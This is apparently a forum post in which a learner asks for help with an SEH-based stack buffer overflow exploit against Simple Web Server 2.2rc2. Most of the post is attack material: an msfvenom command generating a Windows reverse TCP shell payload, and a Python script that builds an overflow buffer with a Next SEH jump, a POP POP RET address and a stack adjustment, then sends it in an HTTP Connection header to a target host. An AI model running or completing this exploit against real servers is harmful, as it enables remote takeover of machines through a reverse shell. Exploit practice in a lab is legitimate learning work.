24 Jan
Stack Buffer Overflow using SEH in Simple Web Server 2.2rc2
I am practicing writing an exploit for Simple Web Server 2.2rc2. I was able to:
- find the proper offset to overwrite SE Handler and Next SEH
- find a POP, POP, RET address
My problem is that I can't execute my shell (generated by msfvenom):
msfvenom --platform windows -a x86 -p windows/shell_reverse_tcp LHOST=IP LPORT=80 EXITFUNC=thread -b "\x00\x0a\x0d" -f python -v shellcode
I have tried to:
- place my code directly after SE Handler
- prepend the shellcode with a stack adjustment
- add a NOP sled before the shellcode
All I see in the debugger is that my shellcode crashes the app.
Here is my current code:
#!/usr/bin/python
import socket,struct,os
ip = "192.168.123.2"
port = 80
rsp_offset = 2048
seh_offset = 2280
buf_size = 2400
#shellcode= # generated by msfvenom
buf = ""
buf+= "A" * (rsp_offset-len(buf))
buf+= "BBBB" # EIP
buf+= "C" * (seh_offset-len(buf))
buf+= "\xeb\x07\x90\x90" # Next SEH: JMP +7 to shellcode
buf+= struct.pack("<I", 0x6FC5447E) # POP,POP,RET
buf+= "\x90\x83\xec\x20" # stack adjustment
buf+= shellcode
#buf+= "F" * (buf_size-len(buf))
req = "GET / HTTP/1.1\r\n"
req += "Host: 192.168.122.2\r\n"
req += "Connection:" + buf + "\r\n"
req += "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(req)
s.close()
Can someone give me a hint about what I am doing wrong? The app is available here